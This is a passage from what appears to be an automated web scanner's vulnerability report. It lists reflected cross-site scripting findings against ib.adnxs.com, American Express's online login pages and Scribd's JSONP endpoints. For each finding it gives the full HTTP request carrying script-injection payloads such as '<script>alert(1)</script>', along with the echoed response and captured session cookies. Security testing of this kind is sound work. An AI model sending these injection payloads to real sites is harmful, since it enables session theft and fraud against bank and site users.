GET /ab?enc=AAAAAAAAAEBxPQrXo3D5PwAAAMDMzPQ_cT0K16Nw-T8AAAAAAAAAQKsy-vWCGn5C___________2641OAAAAAK5LAABlAQAAHgAAAAMAAADpQQcAPWQAAAEAAABVU0QAVVNEACwB-gANHA4C3hABAgUCAQQAAAAAJCIrnAAAAAA.&tt_code=vert-15&click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwVizEOwDAIA78SMXcAG0LTN0XdOlX9e2HynWy_Qso1wqnHEKI4AQuWWYl4LsOaUNI501Yu6WV3GdBs6xsqo1P1LPTC.9m7cBaae.D7AXeHFS0-%26redirectURL=b0767'-alert(1)-'176e182b5ad&pixel=http://va.px.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26creativeID=126127%26message=eJwVizEOwDAIA78SMXcAG0LTN0XdOlX9e2HynWy_Qso1wqnHEKI4AQuWWYl4LsOaUNI501Yu6WV3GdBs6xsqo1P1LPTC.9m7cBaae.D7AXeHFS0-%26managed=false&referrer=http://www.scribd.com&media_subtypes=1&pp=AAABMtphucHYWhn3WbE1kogC8vTLjrWBBx3-Ew&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ3CQAwF0B8C6KSsQWspPvsupmAFdnBwXLMIMzEGQ9BTo7z-TRgAXLSlZ6gRZxhpa51MWUlrZDJft0fXgsP99f1NGPdh1uua3GiRNUmqGM3hSe4e3rbQWaTgCCy3ghOGjxecgecbf9eIpIhzAAAA%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-11576; path=/; expires=Wed, 04-Jan-2012 17:57:48 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: sess=1; path=/; expires=Fri, 07-Oct-2011 17:57:48 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e>W`#*ig^1+<KN9OBmFz.fmaa(>[7i@1>8=/HzC@rEXx>E[2((qi8I37(TlSK/#<2ZWc:tSr=y*(Od$<_TyZVGg1tdA5TnBMqRKueSrKd=JSwjv8TIoweOs6oZ?G(q6DANvH^5Q; path=/; expires=Wed, 04-Jan-2012 17:57:48 GMT; domain=.adnxs.com; HttpOnly
Date: Thu, 06 Oct 2011 17:57:48 GMT
Content-Length: 2541

function writeJS(doc){
var str='';
str += '<iframe src="http:\/\/view.atdmt.com\/COM\/iview\/334309161\/direct;wi.300;hi.250\/01?click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwVizEOwDAIA78SMXcAG0LTN0XdOlX9e2HynWy_Qso1wqnHEKI4AQuWWYl4LsOaUNI501Yu6WV3GdBs6xsqo1P1LPTC.9m7cBaae.D7AXeHFS0-%26redirectURL=b0767'-alert(1)-'176e182b5adhttp%253A%252F%252Fbid.openx.net%252Fclick%253Fcd%253DH4sIAAAAAAAAABXLsQ3CQAwF0B8C6KSsQWspPvsupmAFdnBwXLMIMzEGQ9BTo7z-TRgAXLSlZ6gRZxhpa51MWUlrZDJft0fXgsP99f1NGPdh1uua3GiRNUmqGM3hSe4e3rbQWaTgCCy3ghOGjxe
...[SNIP]...

1.36. http://ib.adnxs.com/ab [pixel parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ab

Issue detail

The value of the pixel request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 23745'%3balert(1)//71d60156a95 was submitted in the pixel parameter. This input was echoed as 23745';alert(1)//71d60156a95 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ab?enc=AAAAAAAAAEBxPQrXo3D5PwAAAMDMzPQ_cT0K16Nw-T8AAAAAAAAAQKsy-vWCGn5C___________2641OAAAAAK5LAABlAQAAHgAAAAMAAADpQQcAPWQAAAEAAABVU0QAVVNEACwB-gANHA4C3hABAgUCAQQAAAAAJCIrnAAAAAA.&tt_code=vert-15&click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Click%26message=eJwVizEOwDAIA78SMXcAG0LTN0XdOlX9e2HynWy_Qso1wqnHEKI4AQuWWYl4LsOaUNI501Yu6WV3GdBs6xsqo1P1LPTC.9m7cBaae.D7AXeHFS0-%26redirectURL=&pixel=http://va.px.invitemedia.com/adnxs_imp%3FreturnType=image%26key=AdImp%26cost=$%7BPRICE_PAID%7D%26creativeID=126127%26message=eJwVizEOwDAIA78SMXcAG0LTN0XdOlX9e2HynWy_Qso1wqnHEKI4AQuWWYl4LsOaUNI501Yu6WV3GdBs6xsqo1P1LPTC.9m7cBaae.D7AXeHFS0-%26managed=false23745'%3balert(1)//71d60156a95&referrer=http://www.scribd.com&media_subtypes=1&pp=AAABMtphucHYWhn3WbE1kogC8vTLjrWBBx3-Ew&pubclick=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ3CQAwF0B8C6KSsQWspPvsupmAFdnBwXLMIMzEGQ9BTo7z-TRgAXLSlZ6gRZxhpa51MWUlrZDJft0fXgsP99f1NGPdh1uua3GiRNUmqGM3hSe4e3rbQWaTgCCy3ghOGjxecgecbf9eIpIhzAAAA%26dst%3D HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-11576; path=/; expires=Wed, 04-Jan-2012 17:57:51 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: sess=1; path=/; expires=Fri, 07-Oct-2011 17:57:51 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/javascript
Set-Cookie: anj=Kfu=8fG68%E:3F.0s]#%2L_'x%SEV/i#+L9!z6Ut0QkM9e>W`#*ig^1+<KN9OBmFz.fmaa(>[7i@1>8=/HzC@rEXx>E[2((qi8I37(TlSK/#=wKd.%?/Nk(QCe*b^.Lgx3*dMmnp0L!b3q2G0uie7@U'*hV%/t-vB_GbgJx`HHXdg_1PoC@VY@8#4:TyaZ9mx$>; path=/; expires=Wed, 04-Jan-2012 17:57:51 GMT; domain=.adnxs.com; HttpOnly
Date: Thu, 06 Oct 2011 17:57:51 GMT
Content-Length: 2480

function writeJS(doc){
var str='';
str += '<iframe src="http:\/\/view.atdmt.com\/COM\/iview\/334309161\/direct;wi.300;hi.250\/01?click=http://va.px.invitemedia.com/pixel%3FreturnType=redirect%26key=Cl
...[SNIP]...
nxs_imp?returnType=image&key=AdImp&cost=1.698113&creativeID=126127&message=eJwVizEOwDAIA78SMXcAG0LTN0XdOlX9e2HynWy_Qso1wqnHEKI4AQuWWYl4LsOaUNI501Yu6WV3GdBs6xsqo1P1LPTC.9m7cBaae.D7AXeHFS0-&managed=false23745';alert(1)//71d60156a95" width="1" height="1"/>
...[SNIP]...

1.37. https://online.americanexpress.com/myca/logon/us/action [DestPage parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://online.americanexpress.com
Path:   /myca/logon/us/action

Issue detail

The value of the DestPage request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 7dada%20a%3db40394ec87f9 was submitted in the DestPage parameter. This input was echoed as 7dada a=b40394ec87f9 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /myca/logon/us/action?request_type=LogonHandler&Face=en_US&DestPage=https%3A%2F%2Fonline.americanexpress.com%2Fmyca%2Fonlinepayment%2Fus%2Fpaymentcenter.do%3Frequest_type%3Dauthreg_PayBill%26Face%3Den_US%26Face%3Den_US%26sorted_index%3D0%26inav%3Dmenu_myacct_paybill7dada%20a%3db40394ec87f9 HTTP/1.1
Host: online.americanexpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.americanexpress.com/?inav=NavLogo
Cookie: 1DE399BF-814F-4BB8-9283-FA77C1188D1B_CCTInformation=3|%3Bexpires%3DSun%2C%2009%20Oct%202011%2006%3A02%3A33%20GMT|Paid Search|7b0ff7f1-27db-42ea-9b5d-c9a853f42791|7b0ff7f1-27db-42ea-9b5d-c9a853f42791|fef58b74-87d8-462d-988d-347ebfba935b|Google|1||tc|1315530464695|14421571065|g||fakereferrerdominator.com|||%2Badvertisement%20%2Bonline467a6%22-alert(document.location)-%2225b78a44730||b|27077|4939834372|69889545|2076866745||||Paid Search|; SaneID=10.10.14.1-1315532265820588; NSC_nf3-x-vt-pomjofqbz-c=ffffffff97a3d0fa45525d5f4f58455e445a4a4286c4; sroute=1007553034.58148.0000

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:27:43 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 06 Oct 2011 20:27:43 GMT
LastModified: Thu, 06 Oct 2011 20:27:43 GMT
Keep-Alive: timeout=15, max=49
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding, User-Agent
Content-Length: 57229


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd">
<html xmlns="_http://www.w3.org/1999/xhtml" lang="en" xml:lang="e
...[SNIP]...
hidden" name="acctSelectedURL" value=https://online.americanexpress.com/myca/onlinepayment/us/paymentcenter.do?request_type=authreg_PayBill&Face=en_US&Face=en_US&sorted_index=0&inav=menu_myacct_paybill7dada a=b40394ec87f9/>
...[SNIP]...

1.38. https://online.americanexpress.com/myca/logon/us/action [DestPage parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   https://online.americanexpress.com
Path:   /myca/logon/us/action

Issue detail

The value of the DestPage request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload c0c0e%20a%3dba4515da9f3a was submitted in the DestPage parameter. This input was echoed as c0c0e a=ba4515da9f3a in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

POST /myca/logon/us/action?request_type=LogLogonHandler&location=us_logon1 HTTP/1.1
Referer: https://online.americanexpress.com/myca/logon/us/action?request_type=LogonHandler&Face=en_US&inav=iNavLnkLog
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: online.americanexpress.com
Cookie: sroute=655231498.58148.0000; $Version=1; NSC_nf3-x-vt-mphpo-b=ffffffff97a3d1e545525d5f4f58455e445a4a42be89; $Path=/; SaneID=50.23.123.106-1317933759898191
Content-Length: 660
Expect: 100-continue
Accept-Encoding: gzip, deflate

DestPage=https%3a%2f%2fonline.americanexpress.com%2fmyca%2facctsumm%2fus%2faction%3frequest_type%3dauthreg_acctAccountSummary%26Face%3den_USc0c0e%20a%3dba4515da9f3a&Face=en_US&Logon=Logon&ReqSource=null&checkboxValueID=&devicePrint=&acctSelected=Cards+-+Check+and+Pay+Bill&acctSelectedURL=https%3a%2f%2fonline.americanexpress.com%2fmyca%2facctsumm%2fus%2faction%3f
...[SNIP]...

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:43:56 GMT
Server: IBM_HTTP_Server
Pragma: no-cache
Cache-Control: no-store
Expires: Thu, 06 Oct 2011 20:43:56 GMT
LastModified: Thu, 06 Oct 2011 20:43:56 GMT
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding, User-Agent
Content-Length: 65523


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml2/DTD/xhtml1-strict.dtd">
<html xmlns="_http://www.w3.org/1999/xhtml" lang="en" xml:lang="e
...[SNIP]...
<input id="acctSelectionHiddenFieldURL" type="hidden" name="acctSelectedURL" value=https://online.americanexpress.com/myca/acctsumm/us/action?request_type=authreg_acctAccountSummary&Face=en_USc0c0e a=ba4515da9f3a/>
...[SNIP]...

1.39. https://online.americanexpress.com/myca/logon/us/en/en_US/common/sorry.jsp [Face parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /myca/logon/us/en/en_US/common/sorry.jsp

Issue detail

The value of the Face request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c063c"%3balert(1)//32613ae77da was submitted in the Face parameter. This input was echoed as c063c";alert(1)//32613ae77da in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /myca/logon/us/en/en_US/common/sorry.jsp?request_type=&Face=en_USc063c"%3balert(1)//32613ae77da&sorted_index=&BPIndex=&ApplID= HTTP/1.1
Referer: https://online.americanexpress.com/myca/logon/us/en/en_US/common/sorry.jsp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: online.americanexpress.com
Cookie: sroute=353241610.58148.0000; $Version=1; NSC_nf3-x-vt-mphpo-b=ffffffff97a3d1e545525d5f4f58455e445a4a42be89; $Path=/; JSESSIONID=0000BIif0oOD1M470jUzbxFsVz7:14fidvqp5; SaneID=50.23.123.106-1317933767479357
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:44:58 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding, User-Agent
Content-Length: 37145
Connection: Keep-Alive


<HTML>
<HEAD>
<TITLE>American Express/Cards/We're Sorry -


</TITLE>
<meta lang="en" http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META NAME="ROBOTS" CONTENT="NOINDE
...[SNIP]...
<a href='javascript:GoToSOA(\"en_USc063c";alert(1)//32613ae77da\",\"/myca/acctsumm/us/action\");' >
...[SNIP]...

1.40. https://online.americanexpress.com/myca/logon/us/en/en_US/common/sorry.jsp [Face parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /myca/logon/us/en/en_US/common/sorry.jsp

Issue detail

The value of the Face request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69e01"><script>alert(1)</script>9ab3c946e96 was submitted in the Face parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /myca/logon/us/en/en_US/common/sorry.jsp?request_type=&Face=en_US69e01"><script>alert(1)</script>9ab3c946e96&sorted_index=&BPIndex=&ApplID= HTTP/1.1
Referer: https://online.americanexpress.com/myca/logon/us/en/en_US/common/sorry.jsp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: online.americanexpress.com
Cookie: sroute=353241610.58148.0000; $Version=1; NSC_nf3-x-vt-mphpo-b=ffffffff97a3d1e545525d5f4f58455e445a4a42be89; $Path=/; JSESSIONID=0000BIif0oOD1M470jUzbxFsVz7:14fidvqp5; SaneID=50.23.123.106-1317933767479357
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:44:53 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding, User-Agent
Content-Length: 37190
Connection: Keep-Alive


<HTML>
<HEAD>
<TITLE>American Express/Cards/We're Sorry -


</TITLE>
<meta lang="en" http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META NAME="ROBOTS" CONTENT="NOINDE
...[SNIP]...
<INPUT TYPE="hidden" NAME="Face" VALUE="en_US69e01"><script>alert(1)</script>9ab3c946e96">
...[SNIP]...

1.41. https://online.americanexpress.com/myca/logon/us/en/en_US/common/sorry.jsp [Face parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /myca/logon/us/en/en_US/common/sorry.jsp

Issue detail

The value of the Face request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f1c73><script>alert(1)</script>98b579ca4b2 was submitted in the Face parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /myca/logon/us/en/en_US/common/sorry.jsp?request_type=&Face=en_USf1c73><script>alert(1)</script>98b579ca4b2&sorted_index=&BPIndex=&ApplID= HTTP/1.1
Referer: https://online.americanexpress.com/myca/logon/us/en/en_US/common/sorry.jsp
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_2; en-us) AppleWebKit/531.21.8 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10
Cache-Control: no-cache
Host: online.americanexpress.com
Cookie: sroute=353241610.58148.0000; $Version=1; NSC_nf3-x-vt-mphpo-b=ffffffff97a3d1e545525d5f4f58455e445a4a42be89; $Path=/; JSESSIONID=0000BIif0oOD1M470jUzbxFsVz7:14fidvqp5; SaneID=50.23.123.106-1317933767479357
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 20:44:55 GMT
Server: IBM_HTTP_Server
Pragma: No-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Vary: Accept-Encoding, User-Agent
Content-Length: 37187
Connection: Keep-Alive


<HTML>
<HEAD>
<TITLE>American Express/Cards/We're Sorry -


</TITLE>
<meta lang="en" http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<META NAME="ROBOTS" CONTENT="NOINDE
...[SNIP]...
<A href=https://www99.americanexpress.com/myca/acctsumm/us/action?request_type=authreg_acctAccountSummary&Face=en_USf1c73><script>alert(1)</script>98b579ca4b2>
...[SNIP]...

1.42. https://online.americanexpress.com/myca/tpintg/us/action [TPREDIRECT_URL parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://online.americanexpress.com
Path:   /myca/tpintg/us/action

Issue detail

The value of the TPREDIRECT_URL request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d14cb'><script>alert(1)</script>1316182f0d8 was submitted in the TPREDIRECT_URL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /myca/tpintg/us/action?request_type=un_nucleusLogonDetect&Face=en_US&TPREDIRECT_URL=https%3a%2f%2fwww.openforum.com%2f%3fcid%253dinav_home%2526inav%253dmenu_business_openforum%26SSOCK%3d1d14cb'><script>alert(1)</script>1316182f0d8 HTTP/1.1
Host: online.americanexpress.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://corp.americanexpress.com/gcs/cards/bx/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 1DE399BF-814F-4BB8-9283-FA77C1188D1B_CCTInformation=3|%3Bexpires%3DSun%2C%2009%20Oct%202011%2005%3A58%3A25%20GMT|Paid Search|4cbe93d7-d0fe-4fc8-81a3-fbdf75480ab2|4cbe93d7-d0fe-4fc8-81a3-fbdf75480ab2|d22001d9-c029-4c78-b9f6-11fcc2adc263|Google|1||tc|1315530216265|14421571065|g||google.com||ad%20cdn|%2Badvertisement%20%2Bonline||b|27077|4939834372|69889545|2076866745||||Paid Search|ad%20cdn; SaneID=50.23.123.106-1315530613634607; NSC_nf3-x-vt-mphpo-b=ffffffff97a3d1e545525d5f4f58455e445a4a42be89; NSC_f3-nzdb-vt-bddutvnn-vt-5655=ffffffff97a3d1a645525d5f4f58455e445a4a42861c; sroute=655231498.58148.0000; bandwidthdetect=vhigh

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 21:07:11 GMT
Server: IBM_HTTP_Server
Content-Length: 931
Keep-Alive: timeout=15, max=82
Connection: Keep-Alive
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>

<title>Loading American Express OPEN Forum...</title>
<style>
   .NUC_
...[SNIP]...
<form name='Nucleus_Splash' method='post' action='https://www.openforum.com/?cid%3dinav_home%26inav%3dmenu_business_openforum&SSOCK=1d14cb'><script>alert(1)</script>1316182f0d8'>
...[SNIP]...

1.43. http://rs3.scribd.com/2/getvid.jsonp [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rs3.scribd.com
Path:   /2/getvid.jsonp

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 69d59<script>alert(1)</script>59c332be82b was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/getvid.jsonp?callback=jsonp20855969d59<script>alert(1)</script>59c332be82b&l=Imh0dHA6Ly93d3cuc2NyaWJkLmNvbS8i&r=bnVsbA%3D%3D&ea=eyJ1c2VyX2lkIjogbnVsbCwgImRvY19pZCI6IG51bGx9&ubtc=InU9N2Y5YmFiYjAtZDI3Mi0wMTJlLTJiZjctMDAyNTkwMDI0YjUyJmg9RmZ3aUd2aVQxOUY4a3pKclF4QWl0RlNUclBlcHkvc1h0UU1WSFpGWWd4Yz0i HTTP/1.1
Host: rs3.scribd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: http://www.scribd.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: scribd_ubtc=u%3D7f9babb0-d272-012e-2bf7-002590024b52%26h%3DFfwiGviT19F8kzJrQxAitFSTrPepy%2FsXtQMVHZFYgxc%3D; scribd_rtc=qK44LfBrOJlkmgVWLmDe7vvAKJAcf25hXjFrr8W2Kx2CIv0p749Lsbwq94S%2BL%2BqnZ8IN5rikJITyXhemdWYWLESIjknufvynJXiwrSSpU79C0s199Y5%2Bv4fXCyljujrqJGvi%2BOKMXu8HOmFXHpwftcfa98Lo7zcgUoIEDcbYbDQSISK%2BYw5X6tVdf0HSz%2B8VtEeaaZBS%2Fybl%2FkvCOMm%2B4POZm2a1Uu98mCpYipV%2FOXFd7MP6XnM4J47D69UW71%2FgYJDAQgwfcw%2BT1M36xraztlqOvgfe9jjHMQwgqavg0aQtp4Q%2BCYeoEi1HCvs2ALiv-aZ9whwIVIiOvjuaOyZQmdV89r6E%3D; _scribd_session=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNoSGFzaHsABjoKQHVzZWR7AA%3D%3D--fc7b6c3069b12443693a170a61dfab07795a4030; __qca=P0-1314780605-1317923807712; __utma=137936306.1317324286.1317923808.1317923808.1317923808.1; __utmb=137936306.6.9.1317923817856; __utmc=137936306; __utmz=137936306.1317923808.1.1.utmcsr=360i.com|utmccn=(referral)|utmcmd=referral|utmcct=/services/mobile-marketing.html; __utmv=137936306.|1=logged_in=false=1

Response

HTTP/1.1 200 OK
Date: Thu, 06 Oct 2011 17:58:46 GMT
Content-Type: text/javascript; charset=UTF-8"
Connection: keep-alive
Content-Length: 121
Etag: "37cc169dc7d7fbfff63d3a0d0303452d176e5d39"
Server: TornadoServer/1.2.1

jsonp20855969d59<script>alert(1)</script>59c332be82b([{"status": "success", "logTimeoutLen": 30000.0, "vid": 558593529}])

1.44. http://rs6.scribd.com/2/getvid.jsonp [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rs6.scribd.com
Path:   /2/getvid.jsonp

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f37cd<script>alert(1)</script>a929a3a3307 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/getvid.jsonp?callback=jsonp566718f37cd<script>alert(1)</script>a929a3a3307&l=Imh0dHA6Ly93d3cuc2NyaWJkLmNvbS9kb2MvMzc0MDU5NzAvMzYwaS1zLU1vYmlsZS1NYXJrZXRpbmctUGxheWJvb2si&r=Imh0dHA6Ly93d3cuMzYwaS5jb20vc2VydmljZXMvbW9iaWxlLW1hcmtldGluZy5odG1sIg%3D%3D&ea=eyJ1c2VyX2lkIjogbnVsbCwgImRvY19pZCI6IDM3NDA1OTcwfQ%3D%3D&ubtc=InU9N2Y5YmFiYjAtZDI3Mi0wMTJlLTJiZjctMDAyNTkwMDI0YjUyJmg9RmZ3aUd2aVQxOUY4a3pKclF4QWl0RlNUclBlcHkvc1h0UU1WSFpGWWd4Yz0i HTTP/1.1
Host: rs6.scribd.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
